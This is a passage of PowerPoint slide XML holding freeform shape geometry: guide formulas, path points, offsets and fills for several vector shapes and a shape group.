                      <a:pt x="225" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="141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" name="Freeform 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7278688" y="4759325"/>
                <a:ext cx="268287" cy="158750"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 746"/>
                  <a:gd name="T1" fmla="*/ 0 h 442"/>
                  <a:gd name="T2" fmla="*/ 174 w 746"/>
                  <a:gd name="T3" fmla="*/ 52 h 442"/>
                  <a:gd name="T4" fmla="*/ 110 w 746"/>
                  <a:gd name="T5" fmla="*/ 184 h 442"/>
                  <a:gd name="T6" fmla="*/ 0 w 746"/>
                  <a:gd name="T7" fmla="*/ 131 h 442"/>
                  <a:gd name="T8" fmla="*/ 57 w 746"/>
                  <a:gd name="T9" fmla="*/ 0 h 442"/>
                  <a:gd name="T10" fmla="*/ 231 w 746"/>
                  <a:gd name="T11" fmla="*/ 79 h 442"/>
                  <a:gd name="T12" fmla="*/ 745 w 746"/>
                  <a:gd name="T13" fmla="*/ 310 h 442"/>
                  <a:gd name="T14" fmla="*/ 682 w 746"/>
                  <a:gd name="T15" fmla="*/ 441 h 442"/>
                  <a:gd name="T16" fmla="*/ 174 w 746"/>
                  <a:gd name="T17" fmla="*/ 210 h 442"/>
                  <a:gd name="T18" fmla="*/ 231 w 746"/>
                  <a:gd name="T19" fmla="*/ 79 h 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46" h="442">
                    <a:moveTo>
                      <a:pt x="57" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="174" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="231" y="79"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="745" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="79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6" name="Freeform 68"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7327900" y="4668838"/>
                <a:ext cx="269875" cy="141287"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 52 w 751"/>
                  <a:gd name="T1" fmla="*/ 21 h 394"/>
                  <a:gd name="T2" fmla="*/ 199 w 751"/>
                  <a:gd name="T3" fmla="*/ 79 h 394"/>
                  <a:gd name="T4" fmla="*/ 231 w 751"/>
                  <a:gd name="T5" fmla="*/ 0 h 394"/>
                  <a:gd name="T6" fmla="*/ 325 w 751"/>
                  <a:gd name="T7" fmla="*/ 37 h 394"/>
                  <a:gd name="T8" fmla="*/ 294 w 751"/>
                  <a:gd name="T9" fmla="*/ 116 h 394"/>
                  <a:gd name="T10" fmla="*/ 572 w 751"/>
                  <a:gd name="T11" fmla="*/ 231 h 394"/>
                  <a:gd name="T12" fmla="*/ 572 w 751"/>
                  <a:gd name="T13" fmla="*/ 231 h 394"/>
                  <a:gd name="T14" fmla="*/ 598 w 751"/>
                  <a:gd name="T15" fmla="*/ 236 h 394"/>
                  <a:gd name="T16" fmla="*/ 619 w 751"/>
                  <a:gd name="T17" fmla="*/ 236 h 394"/>
                  <a:gd name="T18" fmla="*/ 619 w 751"/>
                  <a:gd name="T19" fmla="*/ 236 h 394"/>
                  <a:gd name="T20" fmla="*/ 635 w 751"/>
                  <a:gd name="T21" fmla="*/ 226 h 394"/>
                  <a:gd name="T22" fmla="*/ 651 w 751"/>
                  <a:gd name="T23" fmla="*/ 205 h 394"/>
                  <a:gd name="T24" fmla="*/ 651 w 751"/>
                  <a:gd name="T25" fmla="*/ 205 h 394"/>
                  <a:gd name="T26" fmla="*/ 656 w 751"/>
                  <a:gd name="T27" fmla="*/ 189 h 394"/>
                  <a:gd name="T28" fmla="*/ 656 w 751"/>
                  <a:gd name="T29" fmla="*/ 189 h 394"/>
                  <a:gd name="T30" fmla="*/ 661 w 751"/>
                  <a:gd name="T31" fmla="*/ 173 h 394"/>
                  <a:gd name="T32" fmla="*/ 750 w 751"/>
                  <a:gd name="T33" fmla="*/ 210 h 394"/>
                  <a:gd name="T34" fmla="*/ 750 w 751"/>
                  <a:gd name="T35" fmla="*/ 210 h 394"/>
                  <a:gd name="T36" fmla="*/ 735 w 751"/>
                  <a:gd name="T37" fmla="*/ 257 h 394"/>
                  <a:gd name="T38" fmla="*/ 735 w 751"/>
                  <a:gd name="T39" fmla="*/ 257 h 394"/>
                  <a:gd name="T40" fmla="*/ 719 w 751"/>
                  <a:gd name="T41" fmla="*/ 299 h 394"/>
                  <a:gd name="T42" fmla="*/ 719 w 751"/>
                  <a:gd name="T43" fmla="*/ 299 h 394"/>
                  <a:gd name="T44" fmla="*/ 703 w 751"/>
                  <a:gd name="T45" fmla="*/ 336 h 394"/>
                  <a:gd name="T46" fmla="*/ 687 w 751"/>
                  <a:gd name="T47" fmla="*/ 362 h 394"/>
                  <a:gd name="T48" fmla="*/ 687 w 751"/>
                  <a:gd name="T49" fmla="*/ 362 h 394"/>
                  <a:gd name="T50" fmla="*/ 671 w 751"/>
                  <a:gd name="T51" fmla="*/ 378 h 394"/>
                  <a:gd name="T52" fmla="*/ 651 w 751"/>
                  <a:gd name="T53" fmla="*/ 389 h 394"/>
                  <a:gd name="T54" fmla="*/ 651 w 751"/>
                  <a:gd name="T55" fmla="*/ 389 h 394"/>
                  <a:gd name="T56" fmla="*/ 629 w 751"/>
                  <a:gd name="T57" fmla="*/ 393 h 394"/>
                  <a:gd name="T58" fmla="*/ 603 w 751"/>
                  <a:gd name="T59" fmla="*/ 389 h 394"/>
                  <a:gd name="T60" fmla="*/ 603 w 751"/>
                  <a:gd name="T61" fmla="*/ 389 h 394"/>
                  <a:gd name="T62" fmla="*/ 572 w 751"/>
                  <a:gd name="T63" fmla="*/ 383 h 394"/>
                  <a:gd name="T64" fmla="*/ 535 w 751"/>
                  <a:gd name="T65" fmla="*/ 367 h 394"/>
                  <a:gd name="T66" fmla="*/ 236 w 751"/>
                  <a:gd name="T67" fmla="*/ 247 h 394"/>
                  <a:gd name="T68" fmla="*/ 210 w 751"/>
                  <a:gd name="T69" fmla="*/ 315 h 394"/>
                  <a:gd name="T70" fmla="*/ 120 w 751"/>
                  <a:gd name="T71" fmla="*/ 278 h 394"/>
                  <a:gd name="T72" fmla="*/ 147 w 751"/>
                  <a:gd name="T73" fmla="*/ 210 h 394"/>
                  <a:gd name="T74" fmla="*/ 0 w 751"/>
                  <a:gd name="T75" fmla="*/ 152 h 394"/>
                  <a:gd name="T76" fmla="*/ 52 w 751"/>
                  <a:gd name="T77" fmla="*/ 21 h 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751" h="394">
                    <a:moveTo>
                      <a:pt x="52" y="21"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="199" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="671" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="603" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="603" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="21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7" name="Freeform 69"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7412038" y="4513263"/>
                <a:ext cx="273050" cy="225425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 630 w 757"/>
                  <a:gd name="T1" fmla="*/ 557 h 626"/>
                  <a:gd name="T2" fmla="*/ 630 w 757"/>
                  <a:gd name="T3" fmla="*/ 557 h 626"/>
                  <a:gd name="T4" fmla="*/ 635 w 757"/>
                  <a:gd name="T5" fmla="*/ 520 h 626"/>
                  <a:gd name="T6" fmla="*/ 635 w 757"/>
                  <a:gd name="T7" fmla="*/ 510 h 626"/>
                  <a:gd name="T8" fmla="*/ 625 w 757"/>
                  <a:gd name="T9" fmla="*/ 494 h 626"/>
                  <a:gd name="T10" fmla="*/ 625 w 757"/>
                  <a:gd name="T11" fmla="*/ 494 h 626"/>
                  <a:gd name="T12" fmla="*/ 609 w 757"/>
                  <a:gd name="T13" fmla="*/ 473 h 626"/>
                  <a:gd name="T14" fmla="*/ 582 w 757"/>
                  <a:gd name="T15" fmla="*/ 457 h 626"/>
                  <a:gd name="T16" fmla="*/ 0 w 757"/>
                  <a:gd name="T17" fmla="*/ 426 h 626"/>
                  <a:gd name="T18" fmla="*/ 47 w 757"/>
                  <a:gd name="T19" fmla="*/ 284 h 626"/>
                  <a:gd name="T20" fmla="*/ 441 w 757"/>
                  <a:gd name="T21" fmla="*/ 331 h 626"/>
                  <a:gd name="T22" fmla="*/ 441 w 757"/>
                  <a:gd name="T23" fmla="*/ 326 h 626"/>
                  <a:gd name="T24" fmla="*/ 99 w 757"/>
                  <a:gd name="T25" fmla="*/ 137 h 626"/>
                  <a:gd name="T26" fmla="*/ 147 w 757"/>
                  <a:gd name="T27" fmla="*/ 0 h 626"/>
                  <a:gd name="T28" fmla="*/ 598 w 757"/>
                  <a:gd name="T29" fmla="*/ 294 h 626"/>
                  <a:gd name="T30" fmla="*/ 598 w 757"/>
                  <a:gd name="T31" fmla="*/ 294 h 626"/>
                  <a:gd name="T32" fmla="*/ 651 w 757"/>
                  <a:gd name="T33" fmla="*/ 331 h 626"/>
                  <a:gd name="T34" fmla="*/ 693 w 757"/>
                  <a:gd name="T35" fmla="*/ 368 h 626"/>
                  <a:gd name="T36" fmla="*/ 693 w 757"/>
                  <a:gd name="T37" fmla="*/ 368 h 626"/>
                  <a:gd name="T38" fmla="*/ 724 w 757"/>
                  <a:gd name="T39" fmla="*/ 394 h 626"/>
                  <a:gd name="T40" fmla="*/ 740 w 757"/>
                  <a:gd name="T41" fmla="*/ 426 h 626"/>
                  <a:gd name="T42" fmla="*/ 740 w 757"/>
                  <a:gd name="T43" fmla="*/ 426 h 626"/>
                  <a:gd name="T44" fmla="*/ 750 w 757"/>
                  <a:gd name="T45" fmla="*/ 457 h 626"/>
                  <a:gd name="T46" fmla="*/ 756 w 757"/>
                  <a:gd name="T47" fmla="*/ 489 h 626"/>
                  <a:gd name="T48" fmla="*/ 756 w 757"/>
                  <a:gd name="T49" fmla="*/ 489 h 626"/>
                  <a:gd name="T50" fmla="*/ 745 w 757"/>
                  <a:gd name="T51" fmla="*/ 526 h 626"/>
                  <a:gd name="T52" fmla="*/ 735 w 757"/>
                  <a:gd name="T53" fmla="*/ 567 h 626"/>
                  <a:gd name="T54" fmla="*/ 714 w 757"/>
                  <a:gd name="T55" fmla="*/ 625 h 626"/>
                  <a:gd name="T56" fmla="*/ 614 w 757"/>
                  <a:gd name="T57" fmla="*/ 588 h 626"/>
                  <a:gd name="T58" fmla="*/ 614 w 757"/>
                  <a:gd name="T59" fmla="*/ 588 h 626"/>
                  <a:gd name="T60" fmla="*/ 630 w 757"/>
                  <a:gd name="T61" fmla="*/ 557 h 6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57" h="626">
                    <a:moveTo>
                      <a:pt x="630" y="557"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="630" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="740" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="740" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="756" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="557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67" name="Group 166"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4399359" y="3012516"/>
              <a:ext cx="465488" cy="329720"/>
              <a:chOff x="4929188" y="3675063"/>
              <a:chExt cx="342900" cy="242887"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="199" name="Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4935538" y="3678238"/>
                <a:ext cx="69850" cy="85725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 195"/>
                  <a:gd name="T1" fmla="*/ 167 h 239"/>
                  <a:gd name="T2" fmla="*/ 26 w 195"/>
                  <a:gd name="T3" fmla="*/ 238 h 239"/>
                  <a:gd name="T4" fmla="*/ 0 w 195"/>
                  <a:gd name="T5" fmla="*/ 238 h 239"/>
                  <a:gd name="T6" fmla="*/ 79 w 195"/>
                  <a:gd name="T7" fmla="*/ 0 h 239"/>
                  <a:gd name="T8" fmla="*/ 114 w 195"/>
                  <a:gd name="T9" fmla="*/ 0 h 239"/>
                  <a:gd name="T10" fmla="*/ 194 w 195"/>
                  <a:gd name="T11" fmla="*/ 238 h 239"/>
                  <a:gd name="T12" fmla="*/ 167 w 195"/>
                  <a:gd name="T13" fmla="*/ 238 h 239"/>
                  <a:gd name="T14" fmla="*/ 141 w 195"/>
                  <a:gd name="T15" fmla="*/ 167 h 239"/>
                  <a:gd name="T16" fmla="*/ 53 w 195"/>
                  <a:gd name="T17" fmla="*/ 167 h 239"/>
                  <a:gd name="T18" fmla="*/ 132 w 195"/>
                  <a:gd name="T19" fmla="*/ 141 h 239"/>
                  <a:gd name="T20" fmla="*/ 106 w 195"/>
                  <a:gd name="T21" fmla="*/ 70 h 239"/>
                  <a:gd name="T22" fmla="*/ 106 w 195"/>
                  <a:gd name="T23" fmla="*/ 70 h 239"/>
                  <a:gd name="T24" fmla="*/ 97 w 195"/>
                  <a:gd name="T25" fmla="*/ 26 h 239"/>
                  <a:gd name="T26" fmla="*/ 97 w 195"/>
                  <a:gd name="T27" fmla="*/ 26 h 239"/>
                  <a:gd name="T28" fmla="*/ 97 w 195"/>
                  <a:gd name="T29" fmla="*/ 26 h 239"/>
                  <a:gd name="T30" fmla="*/ 88 w 195"/>
                  <a:gd name="T31" fmla="*/ 70 h 239"/>
                  <a:gd name="T32" fmla="*/ 61 w 195"/>
                  <a:gd name="T33" fmla="*/ 141 h 239"/>
                  <a:gd name="T34" fmla="*/ 132 w 195"/>
                  <a:gd name="T35" fmla="*/ 141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95" h="239">
                    <a:moveTo>
                      <a:pt x="53" y="167"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="26" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="167"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="132" y="141"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="106" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="141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0" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5011738" y="3684588"/>
                <a:ext cx="34925" cy="82550"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 97"/>
                  <a:gd name="T1" fmla="*/ 0 h 231"/>
                  <a:gd name="T2" fmla="*/ 53 w 97"/>
                  <a:gd name="T3" fmla="*/ 53 h 231"/>
                  <a:gd name="T4" fmla="*/ 96 w 97"/>
                  <a:gd name="T5" fmla="*/ 53 h 231"/>
                  <a:gd name="T6" fmla="*/ 96 w 97"/>
                  <a:gd name="T7" fmla="*/ 80 h 231"/>
                  <a:gd name="T8" fmla="*/ 53 w 97"/>
                  <a:gd name="T9" fmla="*/ 80 h 231"/>
                  <a:gd name="T10" fmla="*/ 53 w 97"/>
                  <a:gd name="T11" fmla="*/ 168 h 231"/>
                  <a:gd name="T12" fmla="*/ 53 w 97"/>
                  <a:gd name="T13" fmla="*/ 168 h 231"/>
                  <a:gd name="T14" fmla="*/ 61 w 97"/>
                  <a:gd name="T15" fmla="*/ 195 h 231"/>
                  <a:gd name="T16" fmla="*/ 61 w 97"/>
                  <a:gd name="T17" fmla="*/ 203 h 231"/>
                  <a:gd name="T18" fmla="*/ 79 w 97"/>
                  <a:gd name="T19" fmla="*/ 203 h 231"/>
                  <a:gd name="T20" fmla="*/ 79 w 97"/>
                  <a:gd name="T21" fmla="*/ 203 h 231"/>
                  <a:gd name="T22" fmla="*/ 96 w 97"/>
                  <a:gd name="T23" fmla="*/ 203 h 231"/>
                  <a:gd name="T24" fmla="*/ 96 w 97"/>
                  <a:gd name="T25" fmla="*/ 221 h 231"/>
                  <a:gd name="T26" fmla="*/ 96 w 97"/>
                  <a:gd name="T27" fmla="*/ 221 h 231"/>
                  <a:gd name="T28" fmla="*/ 70 w 97"/>
                  <a:gd name="T29" fmla="*/ 230 h 231"/>
                  <a:gd name="T30" fmla="*/ 70 w 97"/>
                  <a:gd name="T31" fmla="*/ 230 h 231"/>
                  <a:gd name="T32" fmla="*/ 44 w 97"/>
                  <a:gd name="T33" fmla="*/ 221 h 231"/>
                  <a:gd name="T34" fmla="*/ 35 w 97"/>
                  <a:gd name="T35" fmla="*/ 212 h 231"/>
                  <a:gd name="T36" fmla="*/ 35 w 97"/>
                  <a:gd name="T37" fmla="*/ 212 h 231"/>
                  <a:gd name="T38" fmla="*/ 26 w 97"/>
                  <a:gd name="T39" fmla="*/ 195 h 231"/>
                  <a:gd name="T40" fmla="*/ 26 w 97"/>
                  <a:gd name="T41" fmla="*/ 168 h 231"/>
                  <a:gd name="T42" fmla="*/ 26 w 97"/>
                  <a:gd name="T43" fmla="*/ 80 h 231"/>
                  <a:gd name="T44" fmla="*/ 0 w 97"/>
                  <a:gd name="T45" fmla="*/ 80 h 231"/>
                  <a:gd name="T46" fmla="*/ 0 w 97"/>
                  <a:gd name="T47" fmla="*/ 53 h 231"/>
                  <a:gd name="T48" fmla="*/ 26 w 97"/>
                  <a:gd name="T49" fmla="*/ 53 h 231"/>
                  <a:gd name="T50" fmla="*/ 26 w 97"/>
                  <a:gd name="T51" fmla="*/ 9 h 231"/>
                  <a:gd name="T52" fmla="*/ 53 w 97"/>
                  <a:gd name="T53" fmla="*/ 0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97" h="231">
                    <a:moveTo>
                      <a:pt x="53" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="53" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53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1" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5053013" y="3684588"/>
                <a:ext cx="34925" cy="82550"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 98"/>
                  <a:gd name="T1" fmla="*/ 0 h 231"/>
                  <a:gd name="T2" fmla="*/ 53 w 98"/>
                  <a:gd name="T3" fmla="*/ 53 h 231"/>
                  <a:gd name="T4" fmla="*/ 97 w 98"/>
                  <a:gd name="T5" fmla="*/ 53 h 231"/>
                  <a:gd name="T6" fmla="*/ 97 w 98"/>
                  <a:gd name="T7" fmla="*/ 80 h 231"/>
                  <a:gd name="T8" fmla="*/ 53 w 98"/>
                  <a:gd name="T9" fmla="*/ 80 h 231"/>
                  <a:gd name="T10" fmla="*/ 53 w 98"/>
                  <a:gd name="T11" fmla="*/ 168 h 231"/>
                  <a:gd name="T12" fmla="*/ 53 w 98"/>
                  <a:gd name="T13" fmla="*/ 168 h 231"/>
                  <a:gd name="T14" fmla="*/ 62 w 98"/>
                  <a:gd name="T15" fmla="*/ 195 h 231"/>
                  <a:gd name="T16" fmla="*/ 71 w 98"/>
                  <a:gd name="T17" fmla="*/ 203 h 231"/>
                  <a:gd name="T18" fmla="*/ 80 w 98"/>
                  <a:gd name="T19" fmla="*/ 203 h 231"/>
                  <a:gd name="T20" fmla="*/ 80 w 98"/>
                  <a:gd name="T21" fmla="*/ 203 h 231"/>
                  <a:gd name="T22" fmla="*/ 97 w 98"/>
                  <a:gd name="T23" fmla="*/ 203 h 231"/>
                  <a:gd name="T24" fmla="*/ 97 w 98"/>
                  <a:gd name="T25" fmla="*/ 221 h 231"/>
                  <a:gd name="T26" fmla="*/ 97 w 98"/>
                  <a:gd name="T27" fmla="*/ 221 h 231"/>
                  <a:gd name="T28" fmla="*/ 71 w 98"/>
                  <a:gd name="T29" fmla="*/ 230 h 231"/>
                  <a:gd name="T30" fmla="*/ 71 w 98"/>
                  <a:gd name="T31" fmla="*/ 230 h 231"/>
                  <a:gd name="T32" fmla="*/ 53 w 98"/>
                  <a:gd name="T33" fmla="*/ 221 h 231"/>
                  <a:gd name="T34" fmla="*/ 36 w 98"/>
                  <a:gd name="T35" fmla="*/ 212 h 231"/>
                  <a:gd name="T36" fmla="*/ 36 w 98"/>
                  <a:gd name="T37" fmla="*/ 212 h 231"/>
                  <a:gd name="T38" fmla="*/ 27 w 98"/>
